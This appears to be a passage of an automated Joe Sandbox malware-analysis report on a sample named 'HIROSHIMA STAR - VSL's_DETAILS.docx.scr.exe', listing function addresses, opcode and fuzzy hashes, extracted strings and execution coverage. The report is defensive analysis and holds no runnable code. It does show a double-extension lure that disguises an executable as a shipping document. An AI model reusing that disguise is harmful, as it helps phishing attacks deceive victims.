Opcode ID: 9c08525c2193d3264b2acbd996f5b3a8d8071331617da42d72268e1f38f7b2d9
Instruction ID: e694d52d42fcc0e80c40674d93f95ad1c1b43ef097b6d2c1b5f8845709da131b
Opcode Fuzzy Hash: 9c08525c2193d3264b2acbd996f5b3a8d8071331617da42d72268e1f38f7b2d9
Instruction Fuzzy Hash: CC5128B0E052199BDB14CFA9C5855AEFBB2BF89304F24C169D408AB355DB31A942CFA1

Function 0774E098 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a6846e7e72183a45161663097d59703c44b535a4a8e53766887d8b4839a738
Instruction ID: c32be4ac1636fc067a3187ebfbfa16e7f550151b0b5e543de1f00754d9839b95
Opcode Fuzzy Hash: 71a6846e7e72183a45161663097d59703c44b535a4a8e53766887d8b4839a738
Instruction Fuzzy Hash: 86416DB0E1560ADFCB04CFA9D5416AEFBF2FF89350F20D46AD014A7264D37487418B90

Function 0774B099 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9393709d17210f5773de8a920674bb9ec6be3bdd748d302d47609b44d47cb744
Instruction ID: fbfc07436cdfc39e29da62f1527efdc83f0dc5249ebe371307e18dfb48009e80
Opcode Fuzzy Hash: 9393709d17210f5773de8a920674bb9ec6be3bdd748d302d47609b44d47cb744
Instruction Fuzzy Hash: 824127B4E0520ACBCB44CFAAC5815EEFBF2EF89340F24D46AC515A7264D7309A418FA5

Function 0774B0A8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a204e4fb7b46631d6443b4e71112e925871bb5004b9dcbe34128f15a0642fbb
Instruction ID: 90e7647b7927ca7bb4d4a48b079750b7d3e1ac6bc975e7924781ca97cbe0dfd0
Opcode Fuzzy Hash: 3a204e4fb7b46631d6443b4e71112e925871bb5004b9dcbe34128f15a0642fbb
Instruction Fuzzy Hash: F041F7F0E0520ADBCB44CFAAC5815AEFBF2FF88340F24D56AC515B7224D7309A418BA4

Function 0774E0A8 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8344dfbb7f931b3408b914149981299341f38a43866327b3af55f4c7e1b55c
Instruction ID: eb11fb7695f8e25c1670293f1c1dabec64cfbb47635de3c5eb48fe96ce997c71
Opcode Fuzzy Hash: 9d8344dfbb7f931b3408b914149981299341f38a43866327b3af55f4c7e1b55c
Instruction Fuzzy Hash: 93414BB0E1560ADFCB48CFAAD5456AEFBF2BF89250F20D46AC014B7264E37497418B94

Function 0774AC01 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 061b4d52258fbc8be093110ad274c625d609d84a89bd084a356dd2eb5266824e
Instruction ID: db946f579abfd5effbf30925a9d9f6aa67b4eb525e94ba5ad5b5e52a9c620ed0
Opcode Fuzzy Hash: 061b4d52258fbc8be093110ad274c625d609d84a89bd084a356dd2eb5266824e
Instruction Fuzzy Hash: 0741F2B0E0560ADFCB48CFAAD4816EEFBF2AF89340F14C46AD415A7254D7349A41CFA4

Function 0774AC10 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9343e015e7fdfe6a80b63c1e79e3f16c31ef910406d84049a8f8625967a14864
Instruction ID: 5a4c1bd3e20acf3d50ef4d46904c42155bedae07983ee2d8d06a10ad9d242ccb
Opcode Fuzzy Hash: 9343e015e7fdfe6a80b63c1e79e3f16c31ef910406d84049a8f8625967a14864
Instruction Fuzzy Hash: 5141DFB0E0460ADFCB48CFAAD4815AEFBF2BF89340F25C46AD415B7214D7359A418FA4

Function 07745A60 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c4eb153b01a8a38f9a94203d20977db029eb7a2dd58dd65390a2659e817121f
Instruction ID: 28366319d00a648d8dad5d3d4eb752698ac99db24d131d18541695772f693c64
Opcode Fuzzy Hash: 4c4eb153b01a8a38f9a94203d20977db029eb7a2dd58dd65390a2659e817121f
Instruction Fuzzy Hash: C4210EB1E046189BEB18CFAB98006DEFBF3AFC9200F04C07AD418A6254EB3416558F61

Function 05C30651 Relevance: 7.6, Strings: 6, Instructions: 95COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C30796
4'^q, xrefs: 05C307B9
4'^q, xrefs: 05C30773
4'^q, xrefs: 05C3072D
4'^q, xrefs: 05C30750
4'^q, xrefs: 05C307DC

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2822668367
Opcode ID: 7e22fc23beb29142831d913de4c61f97795d949fcd821343a7dd70aa27a4080d
Instruction ID: b5b0549f3f11369036513126556e5540afe7f00ae61a74f664992746be7d0e0d
Opcode Fuzzy Hash: 7e22fc23beb29142831d913de4c61f97795d949fcd821343a7dd70aa27a4080d
Instruction Fuzzy Hash: A8417E34D813168FCB08EF75F85199E7BB2FB44204B8049ADD005ABAE9EF386955CF91

Function 05C30660 Relevance: 7.6, Strings: 6, Instructions: 95COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C30796
4'^q, xrefs: 05C307B9
4'^q, xrefs: 05C30773
4'^q, xrefs: 05C3072D
4'^q, xrefs: 05C30750
4'^q, xrefs: 05C307DC

Memory Dump Source

Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2822668367
Opcode ID: 887fc657d0cc9c70a95d84ff8cdb871d4dd8ee78ac856465df2467741487df72
Instruction ID: 107313710ce36d2bf0d2cc48fb1e361b95cd9bac29a6840dbf5c6fcd39dcf4a5
Opcode Fuzzy Hash: 887fc657d0cc9c70a95d84ff8cdb871d4dd8ee78ac856465df2467741487df72
Instruction Fuzzy Hash: 39412F34D813168FCB08EF65F55199E77B2FB44304BC049A9D005ABAE8EF386955CF91

Analysis Process: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exePID: 6644, Parent PID: 1376COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25.8%
Total number of Nodes:	31
Total number of Limit Nodes:	5

Executed Functions

Function 02FE7118 Relevance: 6.6, Strings: 5, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 02FE7212
(o^q, xrefs: 02FE753D
,bq, xrefs: 02FE728A
,bq, xrefs: 02FE7298
(o^q, xrefs: 02FE7220

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2525668591
Opcode ID: 0dcb948bce91c21b6177b0ee877b82e54a619145a2609bf0a58b1eec7ddacceb
Instruction ID: 74ae3384dd5be06eb9ced4025b193352232b9ee96d6cca404a22160abb695802
Opcode Fuzzy Hash: 0dcb948bce91c21b6177b0ee877b82e54a619145a2609bf0a58b1eec7ddacceb
Instruction Fuzzy Hash: FEE11C31E00219DFDF16EFA9D984AADFBB2BF88384F558055E906AB365D730E841CB50

Function 02FE29EC Relevance: 5.5, Strings: 4, Instructions: 487
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 02FE2AD8
Xbq, xrefs: 02FE2B57
Xbq, xrefs: 02FE2BA4
Xbq, xrefs: 02FE2A9E

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 9371bd37867fa62770e2460e1e7be0a888e973e85bbc1fdf3dd9bad21917a7a4
Instruction ID: 34e69be15845fe1e8ceac324369459f1b7c763ab52b5665d2f2625134e7dad2a
Opcode Fuzzy Hash: 9371bd37867fa62770e2460e1e7be0a888e973e85bbc1fdf3dd9bad21917a7a4
Instruction Fuzzy Hash: F0F1F861A081D58BDB178F3446683EBFFB7EF8B608B1804E9CDC766253EA255887C750

Function 02FEA088 Relevance: 3.4, Strings: 2, Instructions: 898COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02FEAB13
(o^q, xrefs: 02FEA518

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: 4773e667ce62bac131aa621a80d8105349009b8a4e1b013eda79d8197b1e2a8e
Instruction ID: 9f81ec92cda60a22342e5a57bb555dabee538ad50c8c718461755b31f903d877
Opcode Fuzzy Hash: 4773e667ce62bac131aa621a80d8105349009b8a4e1b013eda79d8197b1e2a8e
Instruction Fuzzy Hash: B1826B71A00209DFCF16CFA8C984AAEBBF2BF88740F158559E5069B265D734ED81CB61

Function 02FE69B0 Relevance: 3.1, Strings: 2, Instructions: 563
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 02FE6EDA
Hbq, xrefs: 02FE6DA6

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: d549b89eb0df19bc63a7482aa313d3b1d2d3b0ad7d3dab7a6779060105f63cf1
Instruction ID: d1e2bda9229a1778b027c11da1390a2e270b71d74f9e7a13c387edc3327a6b58
Opcode Fuzzy Hash: d549b89eb0df19bc63a7482aa313d3b1d2d3b0ad7d3dab7a6779060105f63cf1
Instruction Fuzzy Hash: CE228C70A002198FCB16DF69C854BAEBBF6BF88740F148569E906EB395DB34DD41CB90

Function 02FE3E09 Relevance: 2.8, Strings: 2, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 02FE3E2E
Xbq, xrefs: 02FE3E47

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 11b97c0f053accfbc8306a1c7fd7fd5895bf8d814ca5d9703d731671dc2df9e5
Instruction ID: 97258d8044b2eb15c95c2fb24b57886e949a473d55108f73fd0205fd72f08250
Opcode Fuzzy Hash: 11b97c0f053accfbc8306a1c7fd7fd5895bf8d814ca5d9703d731671dc2df9e5
Instruction Fuzzy Hash: 13919871B04219DBDF59EBB8985427E7BA7BFC4740B04852DD547E7388CE349C028B96

Function 02FE5362 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02FE55C8
PH^q, xrefs: 02FE55D9

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 0e2ccb7926f0c0d83912ede022618a264a093993e274d5b8b604ff2a3b49d5b6
Instruction ID: 5d577cd532b9dd0391151a406ed1ee79b7455c70679a124f238e3ea0f2439f33
Opcode Fuzzy Hash: 0e2ccb7926f0c0d83912ede022618a264a093993e274d5b8b604ff2a3b49d5b6
Instruction Fuzzy Hash: 3F91F574E01218CFDB15CFAAD994A9DBBF2BF88304F14C06AE809AB365DB349945CF10

Function 02FED278 Relevance: 2.7, Strings: 2, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02FED4E0
PH^q, xrefs: 02FED4CF

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: e8f8c2d0dce3f18719e1bb0e014af418b41b448f6ea3b7ca64e263ff529ec764
Instruction ID: fceb99c970e3546cb798ca5fedae86f100af04cdbc96310cfeeb86cc77c3bc1a
Opcode Fuzzy Hash: e8f8c2d0dce3f18719e1bb0e014af418b41b448f6ea3b7ca64e263ff529ec764
Instruction Fuzzy Hash: 5D81D674E00218CFDB19DFAAD984A9DBBF2BF89340F14D069E509AB365DB309985CF10

Function 02FEC468 Relevance: 2.7, Strings: 2, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02FEC6BF
PH^q, xrefs: 02FEC6D0

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: d6ca240a23a9dcd351da750b44880fee8af11c3b24ae2dec3e8a057a7c77e116
Instruction ID: efc8f399469945c7f6e98066d1b04d10c02d48175e675d42e2f53dacac18bfa6
Opcode Fuzzy Hash: d6ca240a23a9dcd351da750b44880fee8af11c3b24ae2dec3e8a057a7c77e116
Instruction Fuzzy Hash: 1681A6B4E00218CFDB15DFAAD984A9DBBF2BF88300F14D06AE519AB365DB349945CF50

Function 02FECCD8 Relevance: 2.7, Strings: 2, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02FECF40
PH^q, xrefs: 02FECF2F

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 615a49a50d4fc5d6cddf4e6764065eedb9d0350901961eb0d94e3119c6c20a44
Instruction ID: a0551ae0bfe364d63aa8074be334fd0397606970e95f06b4324d572de5e2f852
Opcode Fuzzy Hash: 615a49a50d4fc5d6cddf4e6764065eedb9d0350901961eb0d94e3119c6c20a44
Instruction Fuzzy Hash: FD81D474E00248CFDB15DFAAD984A9DBBF2BF89300F14D06AE519AB365DB309981CF11

Function 02FECA08 Relevance: 2.7, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02FECC5F
PH^q, xrefs: 02FECC70

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 4825ab84ec4c48a83f18723b63cd766ac0291753322f4cbe620a2d053d994064
Instruction ID: b745ab13e0a367c25bfe9aa0e855093af70ebf20e39ba001d48b27d572829bf2
Opcode Fuzzy Hash: 4825ab84ec4c48a83f18723b63cd766ac0291753322f4cbe620a2d053d994064
Instruction Fuzzy Hash: EC81C574E00258CFDB15DFAAD994A9DBBF2BF88300F14D06AE519AB365DB309981CF50

Function 02FEC738 Relevance: 2.7, Strings: 2, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02FEC98F
PH^q, xrefs: 02FEC9A0

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: b66311aebb6cd94842918648b1ca77ed13e333380b59ea7ba1c5129633fb1f7c
Instruction ID: 636764053a3e84fc10cee20d797c68f69a9bbde574ee11f618496347367cbf39
Opcode Fuzzy Hash: b66311aebb6cd94842918648b1ca77ed13e333380b59ea7ba1c5129633fb1f7c
Instruction Fuzzy Hash: 3D81D374E00218CFDB15DFAAD994A9DBBF2BF88300F14D06AE519AB365DB309985CF50

Function 02FEC19F Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02FEC400
PH^q, xrefs: 02FEC3EF

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 31ba16223e5ad62a7cf5194652949ab55ea1646d7b9e2313374bb75dd8c691e5
Instruction ID: b721ce6ba91ba0c5f1bdc90bbe04c43a6ae1d468de296eed29e55bd5279c4f91
Opcode Fuzzy Hash: 31ba16223e5ad62a7cf5194652949ab55ea1646d7b9e2313374bb75dd8c691e5
Instruction Fuzzy Hash: BC81B374E00218CFDB15DFAAD984A9DBBF2BF89300F14D06AE509AB365DB349981CF14

Function 02FECFAB Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02FED210
PH^q, xrefs: 02FED1FF

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: d0267f1e7c1d3469cbddd477b369fd07aa20dcd67c08b817283adc7d20e275d6
Instruction ID: 0bca6f8239577e850acd16c063d7b41b615434be04149638c7ea6cd51ea3ad1a
Opcode Fuzzy Hash: d0267f1e7c1d3469cbddd477b369fd07aa20dcd67c08b817283adc7d20e275d6
Instruction Fuzzy Hash: 0A81B774E01218CFEB15DFAAD984A9DBBF2BF88300F14D069E519AB365DB349985CF10

Function 06F8B9D0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dbc4da6844b94c757aa560fc983a8282e968d81b5a3ca5725fbe80f79b2d50a
Instruction ID: 9f2728b5572ec362cb8a54d54fdd409b7b582da5d0fdd1ed3656c60c3ad88b06
Opcode Fuzzy Hash: 9dbc4da6844b94c757aa560fc983a8282e968d81b5a3ca5725fbe80f79b2d50a
Instruction Fuzzy Hash: 50F1D174E01218CFDB54DFA9D884B9DBBB2BF88304F54C1A9E808AB355DB74A985CF50

Function 06F82FC8 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75a023d052fa50d5e2126c4405bde9b61ebfe3ce03594856541f49d59e435672
Instruction ID: 45c02b3a60d779c705979e3fb2155861a78cfff19d494adcc27c90a1a0b37aa8
Opcode Fuzzy Hash: 75a023d052fa50d5e2126c4405bde9b61ebfe3ce03594856541f49d59e435672
Instruction Fuzzy Hash: 4D72CD75E052288FDB65DFA9C984BD9BBB2BB49300F1091E9E409A7361DB349EC1CF40

Function 06F84E00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eda5d9fb63583fc5a4e553df3248a3c16c210430a515f42f321b5f2cecdf09a
Instruction ID: a46a9e189b2686ea28a29ce87257abf9be8835cdb1216c0d71e7e0d3036ce7c3
Opcode Fuzzy Hash: 7eda5d9fb63583fc5a4e553df3248a3c16c210430a515f42f321b5f2cecdf09a
Instruction Fuzzy Hash: 08C19E78E01219CFDB54DFA5C994B9DBBB2BF89300F1081A9D809AB364DB359E85CF50

Function 06F85260 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d48c10f6b9a2064f8c57971885d596a3e5f4f194caee15c387fb3dc91d308c1e
Instruction ID: c281dd92408c331ab9363e15d42057d401fd32231ab2dca2ba530d4e39e79705
Opcode Fuzzy Hash: d48c10f6b9a2064f8c57971885d596a3e5f4f194caee15c387fb3dc91d308c1e
Instruction Fuzzy Hash: 3EA11570D00209CFDB54DFA9C994B9DBBB2FF89304F209269E419AB3A1DB709985CF54

Function 06F8525A Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f16c6c62c70cc1ae0ec65a3b8dc47c4d039955ac1b2882e53c75b5c0c575935
Instruction ID: 3e73c6f467e2744296e2a06e0d266966198d5e73a2b362360cb6ead9d3b26bdd
Opcode Fuzzy Hash: 0f16c6c62c70cc1ae0ec65a3b8dc47c4d039955ac1b2882e53c75b5c0c575935
Instruction Fuzzy Hash: 3CA1F570D00209CFDB54DFA8C994B9DBBB2BF89304F209269E419AB3A1DB749985CF54

Function 06F855A6 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e862ccd0b5ca8b2ea93a996b5e5946b281b79e51e80da51bb2850f3494b02a9
Instruction ID: 6bda45788df550e878417e71e07cd771638b5f6506919c82439859a5fd34852a
Opcode Fuzzy Hash: 8e862ccd0b5ca8b2ea93a996b5e5946b281b79e51e80da51bb2850f3494b02a9
Instruction Fuzzy Hash: 6A91F570D00209CFEB50DFA8C894B9CBBB2FF49314F2092A9E519AB391DB749985CF54

Function 02FEE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a406a200dc7090af3e44989115772a0041073d105b0b325477fcb32c01a884
Instruction ID: 129ba073f4804661bd58e9dead6d93a605f565f8d7b7524c8650a714195164ea
Opcode Fuzzy Hash: a4a406a200dc7090af3e44989115772a0041073d105b0b325477fcb32c01a884
Instruction Fuzzy Hash: 5F51A574E00208DFDB19DFAAD984A9DBBB2BF88310F208429E815AB364DB319945CF15

Function 02FEE97B Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b11c83ce0bf43e136b835bba06e4d2ab20608ecf2a55d2970b748f8964f0548
Instruction ID: 4795ee2adf478d3b769d4c37807d3ca1f84a725adf72b52efbde402c2518ca7a
Opcode Fuzzy Hash: 7b11c83ce0bf43e136b835bba06e4d2ab20608ecf2a55d2970b748f8964f0548
Instruction Fuzzy Hash: DB51B774E00208DFDB19DFAAD994A9DBBB2FF88310F14D429E815AB364DB319845CF15

Function 02FE76F1 Relevance: 10.5, Strings: 8, Instructions: 482
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 02FE7BFF
(o^q, xrefs: 02FE7C0F
(o^q, xrefs: 02FE78B2
(o^q, xrefs: 02FE77E9
,bq, xrefs: 02FE7B90
(o^q, xrefs: 02FE772E
,bq, xrefs: 02FE7BA0
(o^q, xrefs: 02FE7815

Memory Dump Source

Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 4760d34dfbe18380e8366eade1936df61c64f1d791d1d537f4a83a3e21b5c39c
Instruction ID: a7d7a86f2227fc2811d73957066ee7bffb76eb6cf3209ba1156d0adc4a82409d
